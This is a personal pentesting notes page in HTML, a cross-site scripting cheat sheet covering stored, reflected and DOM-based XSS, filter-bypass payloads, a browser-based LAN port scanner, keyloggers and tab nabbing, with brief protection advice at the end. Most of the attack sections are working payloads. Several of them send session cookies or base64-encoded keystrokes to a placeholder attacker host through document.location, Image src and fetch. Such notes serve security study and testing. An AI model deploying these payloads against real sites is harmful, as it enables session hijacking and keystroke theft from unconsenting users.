.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#cross-site-scripting">Cross-Site Scripting</a><ul>
<li><a href="#stored-xss">Stored XSS</a><ul>
<li><a href="#examples">Examples</a></li>
</ul>
</li>
<li><a href="#reflected-xss">Reflected XSS</a><ul>
<li><a href="#usage">Usage</a></li>
</ul>
</li>
<li><a href="#dom-based-xss">DOM based XSS</a><ul>
<li><a href="#usage_1">Usage</a></li>
</ul>
</li>
<li><a href="#bypass-filters">Bypass Filters</a></li>
<li><a href="#portscanner-via-javascript">Portscanner via Javascript</a></li>
<li><a href="#keylogger">Keylogger</a></li>
<li><a href="#tab-nabbing">Tab Nabbing</a></li>
<li><a href="#tricks-and-tips">Tricks and Tips</a></li>
<li><a href="#protection-methods">Protection Methods</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="cross-site-scripting">Cross-Site Scripting</h1>
<p>A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.</p>
<h2 id="stored-xss">Stored XSS</h2>
<p>This is where a malicious string originates from the websites database. Such as (stored in a db)
* User profiles
* Chats and comments
* Part of link</p>
<ul>
<li>Blind xss is stored inside the app but effects are only visible by proxy, <a href="https://xsshunter.com/">xsshunter</a>.</li>
</ul>
<h3 id="examples">Examples</h3>
<ul>
<li>Sanity test by changing DOM content</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nt">&lt;script&gt;</span>document.getElementById(&#39;myIdName&#39;).innerHTML=&quot;napf&quot;<span class="nt">&lt;/script&gt;</span>
</code></pre></div>

<ul>
<li>Cookie stealing</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;/log/&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>

<div class="codehilite"><pre><span></span><code>* Navigte to `/logs` and take sid
</code></pre></div>

<ul>
<li>Open nc port and collect cookies</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nb">document</span><span class="p">.</span><span class="nx">location</span><span class="o">=</span><span class="s1">&#39;http://&lt;attacker-IP&gt;:&lt;attacker-Port&gt;/XSS/grabber.php?c=&#39;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
<span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="kd">var</span><span class="w"> </span><span class="nx">i</span><span class="o">=</span><span class="ow">new</span><span class="w"> </span><span class="nx">Image</span><span class="p">;</span><span class="nx">i</span><span class="p">.</span><span class="nx">src</span><span class="o">=</span><span class="s2">&quot;http://&lt;attacker-IP&gt;:&lt;attacker-Port&gt;/?&quot;</span><span class="o">+</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">;</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>

<h2 id="reflected-xss">Reflected XSS</h2>
<p>In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.
* URL parameters inside GET queries
* File paths</p>
<h3 id="usage">Usage</h3>
<p>As script inside parameter</p>
<div class="codehilite"><pre><span></span><code>http://example.com/search?keyword<span class="o">=</span>&lt;script&gt;...&lt;/script&gt;
</code></pre></div>

<ul>
<li>Show server IP</li>
</ul>
<div class="codehilite"><pre><span></span><code>http://example.com/reflected?keyword=<span class="nt">&lt;script&gt;</span>alert(window.location.hostname)<span class="nt">&lt;/script&gt;</span>
</code></pre></div>

<ul>
<li>Session stealing, base64 encoded</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;http://&lt;attacker-IP&gt;/steal?cookie=&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">btoa</span><span class="p">(</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span><span class="p">));</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>

<div class="codehilite"><pre><span></span><code>* open netcat binder to catch the http queries
</code></pre></div>

<h2 id="dom-based-xss">DOM based XSS</h2>
<p>With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:</p>
<div class="codehilite"><pre><span></span><code><span class="kd">var</span><span class="w"> </span><span class="nx">keyword</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">document</span><span class="p">.</span><span class="nx">querySelector</span><span class="p">(</span><span class="s1">&#39;#search&#39;</span><span class="p">)</span><span class="w"></span>
<span class="nx">keyword</span><span class="p">.</span><span class="nx">innerHTML</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="p">...</span><span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>

<h3 id="usage_1">Usage</h3>
<ul>
<li>Find the sub-object inside the document</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nx">test</span><span class="s2">&quot; onmouseover=&quot;</span><span class="nx">alert</span><span class="p">(</span><span class="s1">&#39;YO!&#39;</span><span class="p">)</span><span class="err">&quot;</span><span class="w"></span>
</code></pre></div>

<ul>
<li>Show cookie</li>
</ul>
<div class="codehilite"><pre><span></span><code>test&quot; onmouseover=&quot;alert(document.cookie)&quot;
</code></pre></div>

<h2 id="bypass-filters">Bypass Filters</h2>
<ul>
<li><code>&lt;script&gt;</code> sanitizing</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">img</span> <span class="na">src</span><span class="o">=</span><span class="s">x</span> <span class="na">onerror</span><span class="o">=</span><span class="s">alert(&#39;Hello&#39;);</span><span class="p">&gt;</span>
</code></pre></div>

<p>or </p>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;&lt;</span><span class="err">/script&gt;script&gt;alert(&quot;1&quot;);&lt;&lt;/script&gt;/script&gt;</span><span class="w"></span>
</code></pre></div>

<ul>
<li><code>alert()</code> sanitizing</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="mf">0</span><span class="err">\</span><span class="s2">&quot;autofocus/onfocus=alert(1)--&gt;&lt;onerror=prompt(2)&gt;&quot;</span><span class="o">-</span><span class="nx">confirm</span><span class="p">(</span><span class="mf">3</span><span class="p">)</span><span class="o">-</span><span class="err">&quot;</span><span class="w"></span>
</code></pre></div>

<p>or</p>
<div class="codehilite"><pre><span></span><code><span class="mf">0</span><span class="err">\</span><span class="s2">&quot;autofocus/onfocus=alert(1)--&gt;&lt;video/poster/onerror=prompt(2)&gt;&quot;</span><span class="o">-</span><span class="nx">confirm</span><span class="p">(</span><span class="mf">3</span><span class="p">)</span><span class="o">-</span><span class="err">&quot;</span><span class="w"></span>
</code></pre></div>

<ul>
<li>Strings, here its <code>Hello</code></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">style</span><span class="o">&gt;</span><span class="err">@</span><span class="nx">keyframes</span><span class="w"> </span><span class="nx">slidein</span><span class="w"> </span><span class="p">{}</span><span class="o">&lt;</span><span class="err">/style&gt;&lt;xss style=&quot;animation-duration:1s;animation-name:slidein;animation-iteration-count:2&quot; onanimationiteration=&quot;alert(&#39;Hello&#39;)&quot;&gt;&lt;/xss&gt;</span><span class="w"></span>
</code></pre></div>

<h2 id="portscanner-via-javascript">Portscanner via Javascript</h2>
<ul>
<li>By requesting the favicon, checking port 80</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="w"> </span><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="w"></span>
<span class="w"> </span><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kd">let</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mf">0</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="mf">256</span><span class="p">;</span><span class="w"> </span><span class="nx">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w">  </span><span class="kd">let</span><span class="w"> </span><span class="nx">ip</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;192.168.0.&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">i</span><span class="w"></span>

<span class="w">  </span><span class="kd">let</span><span class="w"> </span><span class="nx">code</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s1">&#39;&lt;img src=&quot;http://&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">ip</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">&#39;/favicon.ico&quot; onload=&quot;this.onerror=null; this.src=/log/&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">ip</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="s1">&#39;&quot;&gt;&#39;</span><span class="w"></span>
<span class="w">  </span><span class="nb">document</span><span class="p">.</span><span class="nx">body</span><span class="p">.</span><span class="nx">innerHTML</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="nx">code</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="o">&lt;</span><span class="err">/script&gt; </span><span class="w"></span>
</code></pre></div>

<ul>
<li><a href="https://www.gnucitizen.org/files/2006/08/jsportscanner.js">pdp's portscanner</a></li>
</ul>
<h2 id="keylogger">Keylogger</h2>
<div class="codehilite"><pre><span></span><code><span class="w"> </span><span class="o">&lt;</span><span class="nx">script</span><span class="w"> </span><span class="nx">type</span><span class="o">=</span><span class="s2">&quot;text/javascript&quot;</span><span class="o">&gt;</span><span class="w"></span>
<span class="w"> </span><span class="kd">let</span><span class="w"> </span><span class="nx">l</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s2">&quot;&quot;</span><span class="p">;</span><span class="w"> </span><span class="c1">// Variable to store key-strokes in</span><span class="w"></span>
<span class="w"> </span><span class="nb">document</span><span class="p">.</span><span class="nx">onkeypress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Event to listen for key presses</span><span class="w"></span>
<span class="w">   </span><span class="nx">l</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="nx">e</span><span class="p">.</span><span class="nx">key</span><span class="p">;</span><span class="w"> </span><span class="c1">// If user types, log it to the l variable</span><span class="w"></span>
<span class="w">   </span><span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="nx">l</span><span class="p">);</span><span class="w"> </span><span class="c1">// update this line to post to your own server</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="o">&lt;</span><span class="err">/script&gt; </span><span class="w"></span>
</code></pre></div>

<ul>
<li>base64 encoded keylogger</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span><span class="w"></span>
<span class="nb">document</span><span class="p">.</span><span class="nx">onkeypress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="kd">function</span><span class="w"> </span><span class="p">(</span><span class="nx">e</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w">    </span><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;http://&lt;attacker-IP&gt;/log?key=&#39;</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">btoa</span><span class="p">(</span><span class="nx">e</span><span class="p">.</span><span class="nx">key</span><span class="p">)</span><span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="o">&lt;</span><span class="err">/script&gt;</span><span class="w"></span>
</code></pre></div>

<h2 id="tab-nabbing">Tab Nabbing</h2>
<ul>
<li>Redirection of source after opening a tab through a provisioned link and back referencing </li>
<li><a href="https://book.hacktricks.xyz/pentesting-web/reverse-tab-nabbing">Hacktricks Tabnabbing</a></li>
</ul>
<h2 id="tricks-and-tips">Tricks and Tips</h2>
<ul>
<li>Use Polyglots</li>
<li><a href="https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html">XSS Filter Evasion Cheat Sheet</a></li>
<li>Close the a vulnerable, exploitable tag and open a script tag</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="p">&lt;/</span><span class="nt">tag</span><span class="p">&gt;&lt;</span><span class="nt">script</span><span class="p">&gt;</span><span class="nx">alert</span><span class="p">(</span><span class="mf">1</span><span class="p">);&lt;/</span><span class="nt">script</span><span class="p">&gt;</span>
</code></pre></div>

<h2 id="protection-methods">Protection Methods</h2>
<p>There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.</p>
<ol>
<li>
<p>Escaping - Escape all user input. This means any data your application has received  is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the &lt; and &gt; characters from being rendered.</p>
</li>
<li>
<p>Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.</p>
</li>
<li>
<p>Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the &lt; character into the HTML entity &#60;</p>
</li>
</ol>
        </span>
</div>
</div>
<div id="footer">

<p></p>
    <center>
            &copy; Stefan Friese
    </center>

        </div>

        <script>
            function linkClick(obj) {
       if (obj.open) {
           console.log('open');
                       if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
                           sessionStorage.removeItem(obj.id);
                       }
                       sessionStorage.setItem(obj.id,"open");
                       console.log(obj.id);

       } else {
           console.log('closed');
                       sessionStorage.removeItem(obj.id);

        }
   //    if (obj.open) {
   //        console.log('open');
   //                    if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
   //                        sessionStorage.removeItem("opened");
   //                    }
   //                    sessionStorage.setItem("opened", obj.id);
   //                    console.log(obj);

   //    } else {
   //        console.log('closed');
   //                    sessionStorage.removeItem("opened");
   //
   // }
            }

     //if ( sessionStorage.getItem("opened")) {
     //                var item = sessionStorage.getItem("opened")
     //                document.getElementById(item)['open'] = 'open';
     //}
            let _keys = Object.keys(sessionStorage);
              if (_keys) {
                              for ( let i = 0; i < _keys.length; i++ ) {
                                              document.getElementById(_keys[i])['open'] = 'open';
                                          }
                          }


//    const detailsElement = document.querySelector('.details-sidebar');
//    detailsElement.addEventListener('toggle', event => {
//        if (event.target.open) {
//            console.log('open');
//                        if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
//                            sessionStorage.removeItem("opened");
//                        }
//                        sessionStorage.setItem("opened", detailsElement.id);
//                        console.log(detailsElement);
//
//        } else {
//            console.log('closed');
//                        sessionStorage.removeItem("opened");
//
//        }
//    });
//
//                async function fetchIndexJSON() {
//                                const response = await fetch('/index.json');
//                                const index = await response.json();
//                                return index;
//                            }
//            // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
//  var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
//    //            fetchIndexJSON()
//    //                .then(index => { console.log(index['index']);});
//  // Load the posts to search
//  fetch('/index').then(function(posts) {
//    // Remember to include Fuse.js before this script.
//
//    var fuse = new Fuse(posts, {
//      keys: ['title', 'tags', 'content'] // What we're searching
//    });
//
//    // Run the search
//    var results = fuse.search(value);
//                  //console.log(results);
//
//    // Generate markup for the posts, implement SearchResults however you want.
// //   var $results = SearchResults(results);
//
//    // Add the element to the empty <div> from before.
////    $('#searchResults').append($results);
// });
//}
</script>

<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
</script>
    <script type="text/x-mathjax-config">
MathJax.Hub.Config({
  config: ["MMLorHTML.js"],
  jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
  extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
    </body>
</html>